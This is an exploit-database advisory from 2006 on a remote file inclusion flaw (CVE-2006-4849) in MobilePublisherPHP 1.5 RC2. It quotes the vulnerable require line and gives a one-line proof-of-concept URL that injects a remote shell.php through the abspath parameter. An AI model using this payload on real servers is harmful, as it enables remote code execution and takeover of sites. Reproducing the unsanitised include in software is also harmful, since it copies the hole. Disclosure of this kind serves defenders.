MobilePublisherPHP <= 1.5 RC2 - Remote File Include Vulnerability

2006-09-17T00:00:00
ID EDB-ID:2383
Type exploitdb
Reporter Timq
Modified 2006-09-17T00:00:00

Description

MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability. CVE-2006-4849. Webapps exploit for php platform

                                        
                                            MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################

# milw0rm.com [2006-09-17]